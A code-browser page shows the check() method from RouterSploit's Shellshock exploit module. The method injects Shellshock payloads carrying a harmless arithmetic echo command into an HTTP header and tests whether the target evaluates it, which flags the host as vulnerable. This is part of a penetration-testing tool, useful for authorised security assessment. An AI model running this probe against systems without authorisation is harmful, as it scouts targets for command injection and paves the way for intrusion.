MCPcopy
hub / github.com/threat9/routersploit / check

Method check

routersploit/modules/exploits/generic/shellshock.py:71–96  ·  view source on GitHub ↗
(self)

Source from the content-addressed store, hash-verified

69
70 @mute
71 def check(self):
72 number = int(utils.random_text(6, alph=string.digits))
73 solution = number - 1
74 cmd = "echo $(({}-1))".format(number)
75
76 marker = utils.random_text(32)
77 for payload in self.payloads:
78 injection = payload.replace("{{marker}}", marker).replace("{{cmd}}", cmd)
79
80 headers = {
81 self.header: injection,
82 }
83
84 response = self.http_request(
85 method=self.method,
86 path=self.path,
87 headers=headers
88 )
89 if response is None:
90 continue
91
92 if str(solution) in response.text:
93 self.valid = payload
94 return True # target is vulnerable
95
96 return False # target not vulnerable

Callers 1

runMethod · 0.95

Calls 1

http_requestMethod · 0.80

Tested by

no test coverage detected